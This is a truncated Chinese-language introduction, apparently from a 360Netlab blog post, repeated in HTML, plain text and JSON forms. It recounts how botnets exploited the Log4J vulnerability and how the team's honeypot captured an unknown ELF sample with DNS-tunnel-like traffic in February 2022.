<!--kg-card-begin: markdown--><h2 id="">背景</h2> <p>自从Log4J漏洞被曝光后,正所谓&quot;忽如一夜漏洞来,大黑小灰笑开怀”。无数黑产团伙摩拳擦掌加入了这个“狂欢派对”,其中既有许多业界非常熟悉的恶意软件家族,同时也有一些新兴势力想趁着这股东风在黑灰产上分一杯羹。360Netlab作为专注于蜜罐和Botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些僵尸网络利用,期间我们看到了Elknot,Gafgyt,Mirai等老朋友的从不缺席,也见证了一些新朋友的粉墨登场。</p> <p>2022年2月9日,360Netlab的蜜罐系统捕获了一个未知的ELF文件通过Log4...
背景 自从Log4J漏洞被曝光后,正所谓"忽如一夜漏洞来,大黑小灰笑开怀”。无数黑产团伙摩拳擦掌加入了这个“狂欢派对”,其中既有许多业界非常熟悉的恶意软件家族,同时也有一些新兴势力想趁着这股东风在黑灰产上分一杯羹。360Netlab作为专注于蜜罐和Botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些僵尸网络利用,期间我们看到了Elknot,Gafgyt,Mirai等老朋友的从不缺席,也见证了一些新朋友的粉墨登场。 2022年2月9日,360Netlab的蜜罐系统捕获了一个未知的ELF文件通过Log4J漏洞传播,此文件在运行时产生的网络流量引发了疑似DNS Tunnel的告警,这引起了我们的兴趣。经过分析,我们...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 背景\n\n自从Log4J漏洞被曝光后,正所谓\"忽如一夜漏洞来,大黑小灰笑开怀”。无数黑产团伙摩拳擦掌加入了这个“狂欢派对”,其中既有许多业界非常熟悉的恶意软件家族,同时也有一些新兴势力想趁着这股东风在黑灰产上分一杯羹。360Netlab作为专注于蜜罐和Botnet检测跟踪的团队,我们自该漏洞被公开后就一直关注它会被哪些僵尸网络利用,期间我们看到了Elknot,Gafgyt,Mirai等老朋友的从不缺席,也见证了一些新朋友的粉墨登场。\n\n2022年2月9日,360Netlab的蜜罐系统捕获了一个...
622886c4a5c41b00078fc62a